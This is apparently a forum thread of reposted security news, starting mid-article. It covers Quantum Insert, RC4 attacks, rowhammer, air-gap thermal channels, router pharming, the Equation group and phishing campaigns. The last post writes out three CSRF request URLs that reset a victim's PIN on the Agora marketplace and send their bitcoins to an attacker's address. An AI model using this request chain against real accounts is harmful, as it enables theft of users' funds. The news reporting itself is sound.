connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim. The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded. Simulating the attack To simulate the Quantum Insert attack, we would require three VMs: One VM will act as a victim Second VM will be used to monitor the traffic Third will be used to shoot a malicious payload to the victim. The proof-of-concept code for simulation is available to be downloaded here: Download hough the details of use for the script is given in the github page, let me re-iterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows: Victim visits mysite.com We need SYN+ACK of mysite.com On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. Shooter has a dependency on Scapy to craft packets (with its header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition. How real time QI works I. Foot printing Agencies like NSA and GCHQ catch hold of choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed as TURMOIL captures the network dumps and passes it to traffic analysis tools like Xkeyscore which automate the packet analysis. II. Build User Profiles Tools like Xkeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attacks. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years. III. Attack the target Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites. IV. Maintain access and persist Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to gain his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts. Detecting QI attacks QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But, both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values than the real packets because of the closer proximity of the attacker to the victim. Links for QI detection for snort: GitHub Links for QI PCAPS: GitHub References http://blog.fox-it.com Source
-
Researchers at Malwarebytes have identified an attack campaign believed to be exploiting a vulnerability in a WordPress plugin. During the past few days, Malwarebytes detected multiple WordPress sites injected with a malicious iframe. The iframe redirects victims to a phony version of The Pirate Bay site. Once there, victims are served the Nuclear exploit kit via a drive-by download attack. "This exploit kit targets most browser plugins but it focuses in particular on the Flash Player which was affected by no less than three zero days in the span of a month," said Jerome Segura, senior security researcher at Malwarebytes Labs. According to Segura, Malwarebytes does not have the exact numbers of how many sites are impacted. However, he said the attack appears to be a specific or targeted campaign. As of this afternoon, the phony site is still up. "And I can add something that I didn't mention originally, in that the site does not index real torrent results but rather pushes a program, maybe to collect affiliate kickbacks," he said. "We believe it has to do with a WordPress plugin rather than the CMS itself," Segura noted. "We have seen similar attacks in recent months taking advantage of the RevSlider Plugin and this could be linked to it." "Once the vulnerability has been exploited, the bad guys usually upload backdoors and shells designed to not only maintain control of the compromised website but also alter its core files, such as injecting iframes," he added. WordPress is one of the most popular - and most targeted - content management systems. In the case of the RevSlider attack, more than 100,000 WordPress websites were found to have been compromised. Segura suggested anyone running WordPress make sure their site and plugins are fully patched, and recommended people not log into their site from unsecure access points such as public Wi-Fis. The attack is ongoing, Segura said. Sursa: Cloned Pirate Bay Site Serving Malware | SecurityWeek.Com
-
- attack
- malwarebytes
-
(and 3 more)
Tagged with:
-
The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols. Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream. It required attackers to view more than 17 billion (234) separate encryptions of the same data. That was a high bar, particularly given that the attack revealed only limited amounts of plaintext. Still, since the researchers demonstrated the attack could decrypt HTTPS-protected authentication cookies used to access user e-mail accounts, Google and other website operators immediately took notice. Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (226) encryptions, a two-order of magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail. Bar-mitzvah attack A second exploit targeting RC4 was devised by researchers from security firm Imperva and was presented Thursday at the Black Hat security conference in Singapore. The attack uses new ways to exploit the "invariance weakness," a key pattern in RC4 keys that can leak plaintext data into the ciphertext under certain conditions. The weakness first came to light in 2001, and led to the fatal exploit against wired equivalent privacy technology used to encrypt Wi-Fi networks. Given the age of the invariance weakness, Imperva researchers are dubbing their new exploit the "bar-mitzvah attack." "The security of RC4 has been questionable for many years, in particular its initialization mechanisms," Imperva researchers wrote in a research paper that accompanied Thursday's Blackhat talk. "However, only in recent years has this understanding begun translating into a call to retire RC4. In this research, we follow [the 2013 RC4 researchers] and show that the impact of the many known vulnerabilities on systems using RC4 is clearly underestimated." The bar-mitzvah attack requires adversaries to sample about one billion RC4 encryptions to infer a credit card number, password, or authentication cookie key. The known weakness exploited involves a flaw found in one out of every 16 million (224) RC4 keys that leads to "structures" in the "least significant bits" of the keystream. The attack is subject to a significant limitation, however, since the leaky plaintext is contained only in the first 100 bytes of ciphertext. Despite the limitation and the challenge of sampling so many encryptions, the attack may be enough to drastically reduce the cost of doing an exhaustive attack that guesses passwords, credit card numbers or similar data. Rather than try every possible combination, the bar-mitzvah attack allows attackers to hone in on a much smaller number of candidates. The growing body of attacks that defeat SSL and TLS encryption are only one threat facing the system millions of Internet users rely on to encrypt sensitive data and authenticate servers. In 2011 hackers broken into Netherlands-based certificate authority DigiNotar and minted counterfeit credentials for Google and other sensitive Web properties. Earlier this week, shoddy practices at an intermediate CA known as MCS Holdings, allowed its customers to obtain unauthorized certificates for several Google addresses. Poor practices on the part of Microsoft also led to the discovery of misissued certificates, on two separate occasions. “RC4 must die” The TLS protocol has two significant phases. The first "handshaking" phase uses asymmetric encryption to negotiate the symmetric encryption keys to be used by an e-mail or Web server and the connecting end user. During the later "record" phase, the parties use the agreed-upon keys to encrypt data using either the AES block cipher or RC4 stream cipher. The two attacks unveiled this month, combined with the exploit disclosed in 2013, are a strong indication the security of RC4 can't be counted on for much longer and should be phased out in favor of alternative algorithms. Retiring RC4 is proving a challenging proposition. A 2011 attack known as BEAST—short for Browser Exploit Against SSL/TLS—targets an encryption mode known as CBC, or cipher block chaining, which is present in most algorithms except for RC4. After BEAST was demonstrated to pose a credible threat to TLS-protected data in transit many security experts recommended website operators opt for RC4 to blunt the threat. That advice is no longer sound, now that RC4 is under attack, too. Imperva researchers say Web app developers should strongly consider disabling RC4 in all their TLS configurations and tech-savvy end uses should disable RC4 in their Browser settings. In February, the Internet Engineering Task Force submitted a request for comments prohibiting the use of RC4 cipher. Use of RC4 has shrunk from about half of all TLS traffic in 2013 to about 30 percent today, but eliminating it altogether may take years. Hanging in the balance, is the security and confidentiality of millions of Internet users. "RC4 was already looking nervously towards the cliff-edge," Kenny Paterson, a Royal Holloway, University of London professor who helped author last week's research, as well as the 2013 research it built on, wrote in a blog post published last week. "Our work pushes RC4 a significant step closer, leaving it teetering on the brink of oblivion for SSL/TLS. After all, attacks can only get better…" Source
-
When heat from one computer is emitted and detected by an adjacent computer, a channel can be opened that researchers are claiming can facilitate the spread of keys, passwords and even malware. According to researchers from the Cyber Security Research Center at Ben Gurion University in Israel, the bridge, something they’ve dubbed BitWhisper, can allow for communication between the two air-gapped machines. Researchers Mordechai Guri and Matan Munitz discovered the method and were overseen by Yuval Elovici, a professor at the school’s Department of Information Systems Engineering. The three plan to publish a paper on their research, “BitWhisper: Covert Signaling Channel between Air-Gapped Computers Using Thermal Manipulations,” soon. To connect two otherwise separate computers – a common sight in specialized computer labs, military networks, etc. – the channel relies on something the researchers call “thermal pings,” the repeated fusion of two networks via proximity and heat. This helps grant a bridge between the public network and the internal network. “At this stage, the attacker can communicate with the formerly isolated network, issuing commands and receiving responses,” the report reads. Once the airgap has been bridged, attackers can do a handful of things, including using the channel to spread keys, unleash a worm, send a command to an industrial control system, or spread malware to other parts of the network. “BitWhisper provides a feasible covert channel, suitable for delivering command and control (C&C) messages, and leaking short chunks of sensitive data such as passwords,” the paper warns. In a video posted to YouTube, the researchers demonstrate how they were able to send a command from one machine to another in order to reposition and then launch a small, toy missle: For their study the researchers positioned personal computers next to one another – side-by-side, back-to-back, even stacked on top of each other – to determine how quickly data traveled between the two. The researchers then ran the machines through a rigorous series of calculations and “busy loops” in order to get them to give off more heat. From there they were able to gauge which of the computers’ temperature sensors were affected by a difference in heat and in turn could be manipulated. Guri and company were left with a complicated attack environment that’s dependent upon multiple, highly-calibrated parameters being set in place in order to carry out an attack. It’s not the speediest method to transfer information – the thermal signal’s rate of change between computers can be slow – very slow – oftentimes taking several minutes to transfer just one signal; at the most, BitWhisper can process eight signals per hour. While slow, the team’s video helps illustrate that the mode of transfer is possible but it just may make more sense to transfer small bits of information. The attack requires no special hardware or additional components, it just requires that both machines are infected by malware. On top of that the channel is bi-directional, meaning the sender could be the receiver in some instances. The attack should work as long as one computer is producing heat and another is monitoring that heat. End-users who wanted to theoretically prevent an attack like this from happening could keep computers far apart from each other. While that may seem like the most sensible move, researchers stress it may be difficult. “Keeping minimal distances between computers is not practical,” the researchers said, “and obviously, managing physical distances between different networks has its complexity in terms of space and administration overheads that increases with every air-gap network used.” Guri and a trio of researchers found a technique last year to use FM waves for data exfiltration. Guri and his team presented the malicious program, AirHopper, at MALCON, a conference in Mumbai last year, and showed how it could be used to decode a radio signal sent from a computer’s video card. That attack helped clarify what is and isn’t possible when it comes to staging threats against air-gapped machines. The threat landscape is a field of great interest to researchers at the university. Going forward Guri states that he and his team are hoping to see if they can get two computers to send and receive information at the same time and to see if it’s possible to get two computers in the same room, giving off heat, to boost the channel’s effective transmission range. Source
-
Hackers are targeting a number of European businesses and organisations with a spear phishing campaign with the colourful codename Operation Woolen Goldfish. Trend Micro researchers reported uncovering the campaign in an Operation Woolen-Goldfish: When Kittens Go Phishing white paper, warning the attacks are likely a follow-up to the "Rocket Kitten" campaign discovered in December 2014. "In February 2015, the Trend Micro Smart Protection Network received an alert from Europe that triggered several targeted attack indicators related to a specific malware family, prompting our threat defence experts to investigate further," read the report. "The alert showed an infected Microsoft Excel file that soon proved to have been launched by Rocket Kitten." Rocket Kitten was an attack campaign that targeted victims with basic spear phishing messages designed to entice them to open malicious Office files loaded with a rare "Ghole" malware. Trend Micro said the follow-up Woolen Goldfish campaign is far more sophisticated. "By the end of 2014 we saw significant changes in the attack behavior of the Rocket Kitten group in terms of spear-phishing campaigns and malware infection schemes," read the paper. The firm highlighted a Woolen Goldfish attack targeting an Israeli engineer as proof of the group's evolution. "The attackers used a OneDrive link in their campaign. OneDrive is a free online cloud storage system from Microsoft that comes with several gigabytes of data storage capacity," explained the report. "The attackers probably decided to store their malicious binaries online rather than send them as an attachment to bypass email detection. "Once executed, the file drops a non-malicious PowerPoint file used as a decoy file, while silently infecting the system with a variant of the CWoolger keylogger." Trend Micro said the CWoolger keylogger malware appears to have been developed by a hacker operating under the "Wool3n.H4t" pseudonym. Wool3n.H4t is believed to have taken part in past Rocket Kitten attacks. "Consistent with the other malware used by the threat actors involved in Operation Woolen Goldfish, the command and control reference is hard-coded as an IP address in the binary," read the paper. "A domain name was not used. Moreover, it lands on the system with a name, which is very similar to some Ghole malware variants [used by Rocket Kitten]." The paper highlighted the malware as proof the Rocket Kitten hackers are developing new attack tools and could become an even bigger threat in the very near future. Rocket Kitten is one of many targeted attack groups currently active. On 12 March, researchers at Kaspersky reported finding evidence the Equation group has been developing and mounting sophisticated attacks since at least 2003. Source
-
In one of more impressive hacks in recent memory, researchers have devised an attack that exploits physical weaknesses in certain types of DDR memory chips to elevate the system rights of untrusted users of Intel-compatible PCs running Linux. The technique, outlined in a blog post published Monday by Google's Project Zero security initiative, works by reversing individual bits of data stored in DDR3 chip modules known as DIMMs. Last year, scientists proved that such "bit flipping" could be accomplished by repeatedly accessing small regions of memory, a feat that—like a magician who transforms a horse into a rabbit—allowed them to change the value of contents stored in computer memory. The research unveiled Monday showed how to fold such bit flipping into an actual attack. "The thing that is really impressive to me in what we see here is in some sense an analog- and manufacturing-related bug that is potentially exploitable in software," David Kanter, senior editor of the Microprocessor Report, told Ars. "This is reaching down into the underlying physics of the hardware, which from my standpoint is cool to see. In essence, the exploit is jumping several layers of the stack." Getting hammered DDR memory is laid out in an array of rows and columns, which are assigned in large blocks to various applications and operating system resources. To protect the integrity and security of the entire system, each large chunk of memory is contained in a "sandbox" that can be accessed only by a given app or OS process. Bit flipping works when a hacker-developed app or process accesses two carefully selected rows of memory hundreds of thousands of times in a tiny fraction of a second. By hammering the two "aggressor" memory regions, the exploit can reverse one or more bits in a third "victim" location. In other words, selected zeros in the victim region will turn into ones or vice versa. The ability to alter the contents of forbidden memory regions has far-reaching consequences. It can allow a user or application who has extremely limited system privileges to gain unfettered administrative control. From there, a hacker may be able to execute malicious code or hijack the operations of other users or software programs. Such elevation-of-privilege hacks are especially potent on servers available in data centers that are available to multiple customers. The vulnerability works only on newer types of DDR3 memory and is the result of the ever smaller dimensions of the silicon. With less space between each DRAM cell, it becomes increasingly hard to prevent one cell from interacting electrically with its neighbors. By repeatedly accessing one or more carefully selected memory locations, attackers can exploit this volatility, causing the charge to leak into or out of adjacent cells. With enough accesses, the technique can change the value of a cell. The attack doesn't work against newer DDR4 silicon or DIMMs that contain ECC, short for error correcting code, capabilities. Mark Seaborn, described as a "sandbox builder and breaker," along with reverse engineer Thomas Dullien, developed two "rowhammer" exploits that, when run as unprivileged processes, were able to gain kernel privileges on an x86-64 Linux system. The first exploit ran as a Native Client module on top of Google Chrome. Once Google developers became aware of the exploit, they disallowed the CLFLUSH instruction that's required to make the exploit work. The second exploit, which ran as a normal Linux process and gained access to all physical memory, will be harder to mitigate on existing machines. There are other things that made the exploits impressive. Irene Abezgauz, a product VP at Dyadic Security and an experienced penetration testing professional, told Ars: The attackers didn't identify the specific models of DDR3 that are susceptible to the attack. While their proof-of-concept exploits targeted a Linux computer running x86-64 hardware, the same technique would likely work against a variety of platforms. The results are impressive, but for a variety of reasons right now, the attacks appear to be more theoretical than practical. For one, the attack appears to allow only local, rather than remote, exploitation, a limitation that significantly curtails its appeal to real-world hackers. And for another, bit flipping works only against certain pre-determined rows. What's more, rowhammering requires more than 540,000 memory accesses in just 64 milliseconds. Unless refinements are made, the demands could make it impractical for attackers to use the technique to reliably hijack a system. Bit flipping shouldn't be mistaken as a class of memory corruption exploit, such as a buffer overflow or a use-after-free, both of which allow attackers to funnel malicious shell code into protected regions of a computer. Rowhammering, by contrast, allows for escalation of privileges, which while serious, is a much more nuanced type of incursion. Rob Graham, CEO of Errata Security, published this blog post that details additional challenges and technical details. Still, the ability to exploit physical weaknesses in the hardware is a highly novel type of attack that breaks new ground and may not be easy to remedy. "This is not like software, where in theory we can go patch the software and get a patch distributed via Windows update within the next two to three weeks," Kanter, of the Microprocessor Report, said. "If you want to actually fix this problem, we need to go out and replace, on a DIMM by DIMM basis, billions of dollars' worth of DRAM. From a practical standpoint that's not ever going to happen." Source
-
Radware, a provider of application delivery DDoS attack protection solutions, this week unveiled its latest attack mitigation platform designed to help carriers and cloud providers protect against high volume DDoS attacks. According to Radware, its new attack mitigation platform provides up to 300Gbps of mitigation capacity and can help protect against volumetric DDoS attacks such as UDP reflection attacks, fragmented and out-of-state floods. Radware’s DefensePro x4420 has the ability to handle 230 million packets per second of attack traffic and was designed for multi-tenant environments with the ability to support up-to 1,000 active policies, separate processing capabilities and customized management & reporting per tenant, the company said. “Cyber-attacks have evolved and reached a tipping point in terms of quantity, length, complexity and targets,” says Carl Herberger, vice president of security solutions for Radware. “In 2014, one in seven cyber-attacks were larger than 10Gbps and we’ve seen attacks 100+Gbps in size. The attack landscape is changing and cyber-attackers are getting more and more aggressive with their tactics. It’s not uncommon for mobile carriers and cloud providers to experience extra-large attacks.” “Soon enough, DDoS attacks will eventually reach the 1Tbs level, placing manufacturers in a frenzy to keep up with future volumetric cyberattacks,” Dan Thormodsgaard, vice president of solutions architecture for FishNet Security, said in a statement. More information on the platform is available online. Sursa: securityweek.com
-
Greyscale pics are a great place to hide malcode Hackers can duck antivirus programs and execute malware in Adobe Reader by using greyscale images, says Danish security boffin Dénes Óvári. Lossy compression is thought to be susceptible to the DCTDecode filter, which should nuke malware woven into images and blunt this form of attack. However new intelligence published in the paper Script in a Lossy Stream (PDF) shows bad guys and penetration testers can use the filter within PDF documents to hide malcode using JPEG images that are set to greyscale to avoid distortion. This process gives antivirus and human malware analysts the slip as they generally assume any malcode hiding in the JPEG filter will be compressed and scrambled. “Following the introduction of a sandbox for JavaScript code in Acrobat Reader, the use of PDF as an attack vector decreased dramatically,” Óvári says. “Although this is not a security breach in itself, the fact that the usage of DCTDecode for this purpose has seemingly been ruled out by the industry means that even known threats could be hidden in this way from anti-virus scanners or researchers. “In order to provide users with maximum protection, the DCTDecode stream must no longer be overlooked: in PDF reader implementations, the referencing of uncompressed image data as parameters from objects expecting binary data should be prohibited.” Óvári says attacks still require exploits to be used inside the DCTDecode stream, reducing the overall threat presented by the research. He created a proof of concept attack in which he says a script was encoded as a high-quality greyscale JPEG image, placed in an image object filtered with DCTDecode, and then referenced by a JavaScript action entry. “When opening the document, the alert dialog just pops up under the old Reader 9, proving that the code of the short script was decompressed losslessly,” he says. The attack still works under the latest version of Reader with some small modification. Óvári says other file formats that assume data within JPEGs uses lossy compression while a greyscale mode is available should be re-evaluated. Source
-
Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. “Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and have an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack. Last summer during DEF CON, a hacking contest called SOHOpelessly Broken focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case, the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source
-
Hackers have targeted Lenovo with a website defacement attack believed to be intended to ‘punish' the firm for its use of the Superfish adware. The attack occurred on Wednesday and forced Lenovo.com to display a slideshow of images while playing Breaking Free from High School Musical. A Lenovo spokesperson told V3 that the firm is taking action to improve the site's security and "investigating other aspects of the attack". "Unfortunately, Lenovo has been the victim of a cyber attack. One effect of this was to redirect traffic from the Lenovo website. We are also actively investigating other aspects," said the spokesperson. "We are responding and have already restored certain functionality to our public-facing website. "We are actively reviewing our network security and will take appropriate steps to bolster our site and protect the integrity of our users' information and experience. "We are also working with third parties to address this attack and will provide additional information as it becomes available." The attack follows Lenovo's use of the Superfish adware on a selected number of laptops. The problem erupted on the Lenovo forum earlier in February when several customers reported finding Superfish installed on their machines. Superfish is adware that collects data such as web traffic information using fake, self-signed root certificates and then uses it to push adverts to the user. The Lizard Squad hacking group is believed to have mounted the attack on Lenovo, although this is yet to be confirmed. Andrew Hay, director of security research at OpenDNS, said that forensic evidence indicates that the attack did stem from Lizard Squad, highlighting similarities with a previous raid on Google.com.vn. Hay explained that Lenovo.com and Google.com.vn use the same registrar, Webnic.cc, and both are hosted in Digital Ocean's Netherlands data centre. He also noted that both raids "used Cloudflare to obfuscate the IP address of the destination server and to balance the traffic load to the website". Ken Westin, senior security analyst at Tripwire, pointed out that the attack would be in line with Lizard Squad's past behaviour in attacking companies that it believes have acted wrongly. "As a result of getting its hands caught in the privacy invading cookie jar with the deployment of the Superfish adware which compromised customers' privacy and security, it has made itself an open target for a number of hacking groups which have essentially declared it open season against Lenovo for its questionable practices," he said. Source
-
Table of contents 1. What is the Equation group?..........................................................................3 2. Why do you call them the “Equation” group?................................................3 3. What attack tools and malware does the*Equation group use? ..................4 4. What is DOUBLEFANTASY?.............................................................................6 5. What is EQUATIONDRUG? ..............................................................................8 6. What is GRAYFISH?.........................................................................................9 7. What is Fanny?............................................................................................. 12 8. What exploits does the Equation group*use?............................................. 14 9. How do victims get infected by EQUATION group malware?...................... 15 10. What is the most sophisticated thing about the EQUATION group? ......... 16 11. Have you observed any artifacts indicating who is behind the*EQUATION*group?.................................................................................. 19 12. How many victims are there?...................................................................... 20 13. Have you seen any non-Windows malware from the Equation group?..... 22 14. What C&C infrastructure do the Equation group implants use? ............... 23 15. How do victims get selected for infection by the EQUATION group?......... 23 16. What kind of encryption algorithms are*used by the EQUATION group?... 27 17. How does the EQUATION group’s attack platforms compare with Regin?................................................................................... 30 18. How did you discover this malware? .......................................................... 31 Indicators of compromise (“one of each”) ......................................................... 32 Read more here: http://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf
-
This week's headlines have been security heavy thanks to the influx of news coming from Kaspersky's Security Analyst Summit. We've seen Kaspersky report everything from a $1bn cyber bank heist operation, to potentially NSA-sponsored and Middle Eastern advanced persistent threats. Specifically we saw threat research papers on the Carbanak, Equation and Desert Falcons attack campaigns. Carbanak is a banking-focused cyber operation that is believed to have stolen $1bn from 100 banks in more than 30 regions using specialist attack tools. Equation is a dangerous hack campaign, believed to have stemmed from the US National Security Agency, that uses a selection of attack tools, including one that can infect the operating systems on hard drives. Desert Falcons is a Middle Eastern cyber mercenary group that is believed to have infected thousands of Windows and Android devices with over 100 different malware variants. Each of these campaigns has its own specific implications for security professionals and the industry in general, but there is one unifying factor for me that is the most interesting: all three used phishing as a primary infection tactic. Phishing, for those who don't know, is an attack that aims to spread malware using infected messages that often masquerade as stemming from a trustworthy source. The message system used in phishing campaigns can include everything from Facebook posts and instant messages, to tweets and basic email. The campaigns are sometimes fairly basic and easy to see through, such as the Nigerian prince emails that circulate offering incredible sums of money in return for bank details, while others can include a social engineering element and are made to look like invoices or corporate communications. The attack strategy may sound simple enough to stop, but for me the trio of threats highlighted by Kaspersky show that most businesses still haven't addressed the phishing threat. There are likely to be several reasons why phishing still works so well. One of the most common that I hear from talking to industry professionals is that many businesses still assume that security is an out-of-the-box technological issue, not a cultural one. Despite constant warnings from security providers and government departments, many companies still assume that, if they have basic perimeter defences in place, they have ticked the security box and don't have to worry about cyber attacks, such as phishing. Sadly, this simply isn't the case. The Carbanak campaign is a particularly good example. Carbanak initially targets victims with spear phishing emails designed to look like legitimate banking communications. The messages contain malicious Microsoft Word and Control Panel Applet attachments that exploit flaws in Microsoft Office 2003, 2007 and 2010 (CVE-2012-0158 and CVE-2013-3906) and Microsoft Word (CVE-2014-1761) to execute the Carbanak backdoor. The initial infection didn't get the hackers access to the more secure internal systems they wanted to breach, but it did get them far enough into the network to begin a reconnaissance phase targeting bank employees, particularly systems administrators. From here, using information stolen during the reconnaissance phase, the attackers were able to get to the companies' crown jewels and steal vast sums of money. The key takeaway here is that firms need to back up their defence technology with robust cyber security awareness, using education programmes that not only teach staff how to spot and avoid falling victim to phishing messages, but how to report incidents to the IT team. Incidents will, of course, still occur; some of the social engineering behind phishing is seriously impressive and can lead to very realistic looking communications. But it would help dramatically to reduce the hackers' win rates and profit margins, a development I think everyone on the right side of the law would regard as positive. Hopefully, while bad, the discovery of Carbanak, Equation and Desert Falcons will at the very least make some firms aware of this. Although, considering my past experience covering the fallout of these attack campaigns, I'm not holding my breath. Source
-
Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government. This mockery of justice has not gone unnoticed. In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack. To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack: URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit= URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices. There will be more to come. Stay safe. Stay anonymous. -The Guardians of Peace Source